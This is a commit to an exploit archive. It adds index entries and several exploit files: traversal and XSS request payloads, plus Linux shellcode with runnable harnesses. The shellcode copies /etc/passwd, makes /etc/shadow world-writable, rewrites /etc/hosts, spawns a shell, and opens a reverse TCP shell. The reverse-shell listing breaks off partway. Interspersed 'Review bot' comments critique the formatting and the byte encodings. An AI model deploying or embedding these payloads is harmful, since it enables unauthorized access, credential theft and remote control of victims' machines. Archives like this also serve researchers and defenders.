Update: 2015-03-17

49 new exploits
Offensive Security 2015-03-17 08:36:10 +00:00
parent 42107c1e33
commit 51e5e42e74
50 changed files with 3063 additions and 0 deletions


@ -32540,6 +32540,7 @@ id,file,description,date,author,platform,type,port
36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,metasploit,java,remote,1617
36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36104,platforms/windows/local/36104.py,"Publish-It 3.6d - Buffer Overflow (SEH) Exploit",2015-02-18,"Andrew Smith",windows,local,0
36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit",2015-02-18,"Todor Donev",hardware,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 SQL Injection and Arbitrary File Upload Vulnerabilities",2011-09-02,KedAns-Dz,php,webapps,0
@ -32564,6 +32565,7 @@ id,file,description,date,author,platform,type,port
36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection Vulnerability",2015-02-20,"K.d Long",xml,webapps,0
36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0
36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0
36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0
@ -32637,6 +32639,7 @@ id,file,description,date,author,platform,type,port
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
@ -32658,6 +32661,7 @@ id,file,description,date,author,platform,type,port
36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0
36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability",2015-03-02,"Ibrahim Raafat",php,webapps,0
36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Shell Upload",2015-02-28,R-73eN,php,webapps,0
36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80
36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0
36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0
@ -32668,6 +32672,8 @@ id,file,description,date,author,platform,type,port
36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0
36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0
36242,platforms/php/webapps/36242.txt,"Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS",2015-03-03,ayastar,php,webapps,0
36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar <= 1.1.4 - SQL Injection vulnerabilities",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0
36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0
36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0
36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0
@ -32697,7 +32703,9 @@ id,file,description,date,author,platform,type,port
36271,platforms/osx/dos/36271.py,"Apple Mac OS X <= 10.6.5 And iOS <= 4.3.3 Mail Denial of Service Vulnerability",2011-10-29,shebang42,osx,dos,0
36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting Vulnerability",2011-11-01,Mr.PaPaRoSSe,php,webapps,0
36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Include Vulnerabilities",2011-11-01,indoushka,php,webapps,0
36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow (55 Bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0
36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd (55 Bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross Site Scripting Vulnerability",2011-11-01,Isfahan,php,webapps,0
36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0
36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0
@ -32712,6 +32720,7 @@ id,file,description,date,author,platform,type,port
36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross Site Scripting Vulnerability",2011-11-07,Mr.PaPaRoSSe,php,webapps,0
36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection Vulnerability",2011-11-07,baltazar,php,webapps,0
36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0
36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal Vulnerability",2011-11-07,Buherátor,java,webapps,0
36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0
36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0
36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0
@ -32776,6 +32785,8 @@ id,file,description,date,author,platform,type,port
36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager i 9.10 nnm/protected/ping.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager i 9.10 nnm/protected/statuspoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 nnm/protected/traceroute.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - CSRF",2015-03-11,"Luis Santana",php,webapps,0
36359,platforms/lin_x86-64/shellcode/36359.c,"x86_64 Shellcode (118 Bytes) - Reads Data From /etc/passwd To /tmp/outfile (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,metasploit,windows,remote,0
36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 'APPE' Command Remote Denial Of Service Vulnerability",2011-11-25,"Houssam Sahli",windows,dos,0
36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0
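Review bot: the description for 36359 states the size twice, "x86_64 Shellcode (118 Bytes) - Reads Data From /etc/passwd To /tmp/outfile (118 bytes)"; drop one of them so the row follows the single-size form the other shellcode entries in this commit use (e.g. 36274, "Chmod 666 /etc/shadow (55 Bytes)").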
@ -32784,3 +32795,41 @@ id,file,description,date,author,platform,type,port
36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0
36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0
36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0
36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Stored XSS",2015-03-13,"ITAS Team",php,webapps,0
36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass Via HTTP Header Pollution",2015-03-12,"BGA Security",xml,webapps,0
36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - LFI Vulnerability",2015-03-12,"TUNISIAN CYBER",php,webapps,0
36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,"Crash bandicot",php,webapps,0
36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,"Crash bandicot",php,webapps,0
36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,"Crash bandicot",php,webapps,0
36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 Web Interface Directory Traversal Vulnerability",2011-11-29,"Nick Freeman",asp,webapps,0
36376,platforms/windows/remote/36376.txt,"Oxide WebServer Directory Traversal Vulnerability",2011-11-29,demonalex,windows,remote,0
36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0
36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 NULL Pointer Invalid HTTP Request Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0
36379,platforms/php/webapps/36379.txt,"OrangeHRM <= 2.6.11 index.php Multiple Parameter XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0
36380,platforms/php/webapps/36380.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php URI XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0
36381,platforms/php/webapps/36381.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0
36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting Vulnerability",2011-11-30,Am!r,php,webapps,0
36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting Vulnerability",2011-11-30,Am!r,php,webapps,0
36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 'index.php' Multiple SQL Injection Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0
36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL injection",2015-03-16,"Moneer Masoud",php,webapps,0
36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Auth Bypass Vulnerability",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0
36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash PoC",2015-03-16,"Avinash Thapa",linux,local,0
36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0
36391,platforms/lin_x86/shellcode/36391.c,"Shellcode - linux/x86 - ROT13 encoded execve(""/bin/sh"") (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36392,platforms/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling Vulnerability",2015-03-14,"Glafkos Charalambous ",windows,dos,0
36393,platforms/lin_x86/shellcode/36393.c,"Shellcode - Linux/x86 - chmod 0777 /etc/shadow obfuscated (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36394,platforms/lin_x86/shellcode/36394.c,"Shellcode - linux/x86 - Obfuscated - map google.com to 127.1.1.1 (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36395,platforms/lin_x86/shellcode/36395.c,"Shellcode - linux/x86 - Obfuscated execve(""/bin/sh"") (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36397,platforms/lin_x86/shellcode/36397.c,"Shellcode - Linux/x86 - Reverse TCP Shell (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36398,platforms/lin_x86/shellcode/36398.c,"Shellcode - Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
36402,platforms/asp/webapps/36402.txt,"Hero 3.69 'month' Parameter Cross Site Scripting Vulnerability",2011-12-01,"Gjoko Krstic",asp,webapps,0
36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0
36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0
36405,platforms/windows/dos/36405.txt,"Serv-U 11.1.0.3 - Denial of Service and Security Bypass Vulnerabilities",2011-12-05,"Luigi Auriemma",windows,dos,0
36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 index.php task Parameter XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
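Review bot: two field-hygiene problems in this hunk will be carried verbatim by anything that parses files.csv: the author field of 36392 has a trailing space ("Glafkos Charalambous "), and the description of 36410 opens the quoted name with a doubled apostrophe (''fckeditor'). Strip the space and use a single apostrophe.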


platforms/asp/webapps/36375.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50841/info
Virtual Vertex Muster is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
Virtual Vertex Muster 6.1.6 is vulnerable; other versions may also be affected.
The following example request is available:
GET /a\..\..\muster.db HTTP/1.1


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50878/info
Hero is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Hero 3.69 is vulnerable; other versions may also be affected.
http://www.example.com/hero_os/events?month=January.htaccess.aspx%22%3E%3Cscript%3Ealert%281%29%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50567/info
Oracle NoSQL is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process.
NoSQL 11g 1.1.100 R2 is vulnerable; other versions may also be affected.
http://www.example.com/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd


@ -0,0 +1,62 @@
/*
Reads data from /etc/passwd to /tmp/outfile
No null bytes
Author: Chris Higgins <chris@chigs.me>
@ch1gg1ns -- github.com/chiggins -- http://chigstuff.com/blog/2014/03/29/my-first-shellcode/
chigstuff.com
Date: 3-27-2014
Size: 118 bytes
Tested: ArchLinux x86_64 3.13.6-1
Assembly:
xor rax, rax
mov al, 2
xor rdi, rdi
mov rbx, 0x647773
push rbx
mov rbx, 0x7361702f6374652f
push rbx
lea rdi, [rsp]
xor rsi, rsi
syscall
mov rbx, rax
xor rax, rax
mov rdi, rbx
mov rsi, rsp
mov dx, 0xFFFF
syscall
mov r8, rax
mov rax, rsp
xor rbx, rbx
push rbx
mov rbx, 0x656c6966
push rbx
mov rbx, 0x74756f2f706d742f
push rbx
mov rbx, rax
xor rax, rax
mov al, 2
lea rdi, [rsp]
xor rsi, rsi
push 0x66
pop si
syscall
mov rdi, rax
xor rax, rax
mov al, 1
lea rsi, [rbx]
xor rdx, rdx
mov rdx, r8
syscall
*/
#include <stdio.h>
#include <string.h>
char shellcode[] = "\x48\x31\xc0\xb0\x02\x48\x31\xff\xbb\x73\x77\x64\x00\x53\x48\xbb\x2f\x65\x74\x63\x70\x61\x73\x53\x48\x8d\x3c\x24\x48\x31\xf6\x0f\x05\x48\x89\xc3\x48\x31\xc0\x48\x89\xdf\x48\x89\xe6\x66\xba\xff\xff\x0f\x05\x49\x89\xc0\x48\x89\xe0\x48\x31\xdb\x53\xbb\x66\x69\x6c\x65\x53\x48\xbb\x2f\x74\x6d\x70\x6f\x75\x74\x53\x48\x89\xc3\x48\x31\xc0\xb0\x02\x48\x8d\x3c\x24\x48\x31\xf6\x6a\x66\x66\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x01\x48\x8d\x33\x48\x31\xd2\x4c\x89\xc2\x0f\x05";
int main() {
printf("len: %d bytes", sizeof shellcode);
(*(void (*)()) shellcode);
return 0;
}
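Review bot: the header comments do not match the byte string. "No null bytes" is contradicted by `\xbb\x73\x77\x64\x00`, which is the 5-byte `mov ebx, 0x647773` encoding (not the `mov rbx` in the listing) and carries a NUL; and the `\x48\xbb` immediate as printed here is only seven bytes (`\x2f\x65\x74\x63\x70\x61\x73`, no '/' between "etc" and "pas"), so the following `\x53` is consumed as the eighth immediate byte instead of acting as `push rbx`, which disagrees with `mov rbx, 0x7361702f6374652f`; the `/tmp/out` immediate (`\x2f\x74\x6d\x70\x6f\x75\x74`) has the same missing '/' against 0x74756f2f706d742f. In main(), `(*(void (*)()) shellcode);` is a cast expression with no call, so the harness only prints the length, and `printf("len: %d bytes", sizeof shellcode)` passes a size_t to %d and counts the array's terminating NUL; use %zu and state whether the size includes it.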


@ -0,0 +1,65 @@
/*
* Linux x86 - ROT13 encoded execve("/bin/sh") - 68 bytes
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/04/slae-4-custom-shellcode-encoder/
*/
/*
global _start
section .text
_start:
jmp short call_decoder
decoder:
pop esi ; shellcode address
xor ecx, ecx ; zero out ecx
mov cl, len ; initialize counter
decode:
cmp byte [esi], 0xD ; can we substract 13?
jl wrap_around ; nope, we need to wrap around
sub byte [esi], 0xD ; substract 13
jmp short process_shellcode ; process the rest of the shellcode
wrap_around:
xor edx, edx ; zero out edx
mov dl, 0xD ; edx = 13
sub dl, byte [esi] ; 13 - shellcode byte value
xor ebx,ebx ; zero out ebx
mov bl, 0xff ; store 0x100 without introducing null bytes
inc ebx
sub bx, dx ; 256 - (13 - shellcode byte value)
mov byte [esi], bl ; write decoded value
process_shellcode:
inc esi ; move to the next byte
loop decode ; decode current byte
jmp short shellcode ; execute decoded shellcode
call_decoder:
call decoder
shellcode:
db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b
db 0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d
len: equ $-shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
// Decoder stub:
"\xeb\x24\x5e\x31\xc9\xb1\x19\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x10\x31\xd2"
"\xb2\x0d\x2a\x16\x31\xdb\xb3\xff\x43\x66\x29\xd3\x88\x1e\x46\xe2\xe3\xeb\x05"
"\xe8\xd7\xff\xff\xff"
// Encoded shellcode:
"\x3e\xcd\x5d\x75\x3c\x3c\x80\x75\x75\x3c\x6f\x76\x7b\x96\xf0\x5d\x96\xef\x60"
"\x96\xee\xbd\x18\xda\x8d";
int main(void) {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
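Review bot: `cmp byte [esi], 0xD` followed by `jl wrap_around` is a signed compare, so every encoded byte with the high bit set (0x80, 0x96, 0xf0 in the db lines) is routed through wrap_around even though `sub byte [esi], 0xD` would handle it; the wrap_around arithmetic (256 - (13 - b)) yields the same value modulo 256 as the direct subtraction, so decoding is still correct, but the comments "can we substract 13? / nope, we need to wrap around" describe a distinction the code does not actually make, and "substract" should read "subtract". In main(), `printf("Shellcode Length: %d\n", strlen(code))` passes a size_t to %d; use %zu (the same harness is repeated in the other xmgv files in this commit).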


@ -0,0 +1,77 @@
/*
* Linux x86 - execve chmod 0777 /etc/shadow
* Obfuscated version - 84 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-828.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/
/*
global _start
section .text
_start:
sub edx, edx
push edx
mov eax, 0xb33fb33f
sub eax, 0x3bd04ede
push eax
jmp short two
end:
int 0x80
four:
push edx
push esi
push ebp
push ebx
mov ecx, esp
push byte 0xc
pop eax
dec eax
jmp short end
three:
push edx
sub eax, 0x2c3d2dff
push eax
mov ebp, esp
push edx
add eax, 0x2d383638
push eax
sub eax, 0x013ffeff
push eax
sub eax, 0x3217d6d2
add eax, 0x31179798
push eax
mov ebx, esp
jmp short four
two:
sub eax, 0x0efc3532
push eax
sub eax, 0x04feca01
inc eax
push eax
mov esi, esp
jmp short three
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80"
"\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c"
"\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2"
"\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e"
"\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca";
int main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}


@ -0,0 +1,78 @@
/*
* Linux x86 - map google.com to 127.1.1.1 in /etc/hosts
* Obfuscated version - 98 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-893.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/
/*
global _start
section .text
_start:
push byte 0x4
pop eax
inc eax
sub edx, edx
push edx
mov ecx, 0x88998899
sub ecx, 0x1525152A
push ecx
sub ecx, 0x0B454440
push ecx
sub ecx, 0x04BACA01
inc ecx
push ecx
sub ecx, 0x6374612E
mov ebx, esp
int 0x80
xchg eax, ebx
jmp short _load_data
_write:
pop eax
xchg eax, ecx
push byte 0x3
pop esi
mov eax, esi
inc eax
push len
pop edx
int 0x80
inc esi
inc esi
inc esi
xchg eax, esi
int 0x80
inc eax
int 0x80
_load_data:
call _write
google: db "127.1.1.1 google.com"
len: equ $-google
_random:
cld
xor esi,esi
cld
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"\x6a\x04\x58\x40\x29\xd2\x52\xb9\x99\x88\x99\x88\x81\xe9\x2a\x15\x25\x15"
"\x51\x81\xe9\x40\x44\x45\x0b\x51\x81\xe9\x01\xca\xba\x04\x41\x51\x81\xe9"
"\x2e\x61\x74\x63\x89\xe3\xcd\x80\x93\xeb\x16\x58\x91\x6a\x03\x5e\x89\xf0"
"\x40\x6a\x14\x5a\xcd\x80\x46\x46\x46\x96\xcd\x80\x40\xcd\x80\xe8\xe5\xff"
"\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65"
"\x2e\x63\x6f\x6d\xfc\x31\xf6\xfc";
int main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}


@ -0,0 +1,46 @@
/*
* Linux x86 - execve("/bin/sh") shellcode
* Obfuscated version - 40 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-811.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/
/*
global _start
section .text
_start:
xor edx, edx
push edx
mov eax, 0x563ED8B7
add eax, 0x12345678
push eax
mov eax, 0xDEADC0DE
sub eax, 0x70445EAF
push eax
push byte 0xb
pop eax
mov ecx, edx
mov ebx, esp
push byte 0x1
pop esi
int 0x80
xchg esi, eax
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"\x31\xd2\x52\xb8\xb7\xd8\x3e\x56\x05\x78\x56\x34\x12\x50\xb8\xde\xc0\xad"
"\xde\x2d\xaf\x5e\x44\x70\x50\x6a\x0b\x58\x89\xd1\x89\xe3\x6a\x01\x5e\xcd"
"\x80\x96\xcd\x80";
int main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}


@ -0,0 +1,77 @@
/*
* Linux x86 - Reverse TCP Shell - 72 bytes
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/02/21/slae-assignment-2-reverse-shell/
*/
/*
global _start
section .text
_start:
; socket(AF_INET, SOCK_STREAM, 0);
push 0x66 ; socketcall()
pop eax
cdq ; zero out edx
push edx ; protocol
inc edx
push edx ; SOCK_STREAM
mov ebx, edx ; socket()
inc edx
push edx ; AF_INET
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; dup2()
xchg ebx, eax ; store sockfd in ebx
mov ecx, edx ; initialize counter to 2
loop:
mov al, 0x3f
int 0x80
dec ecx
jns loop
; connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
mov al, 0x66 ; socketcall()
xchg ebx, edx ; ebx=2, edx=sockfd
push 0x8501A8C0 ; 192.168.1.133
push word 0x3582 ; port
push word bx ; AF_INET
inc ebx ; connect() -> 3
mov ecx, esp ; point to the structure
push 0x10 ; sizeof(struct sockaddr_in)
push ecx ; &serv_addr
push edx ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
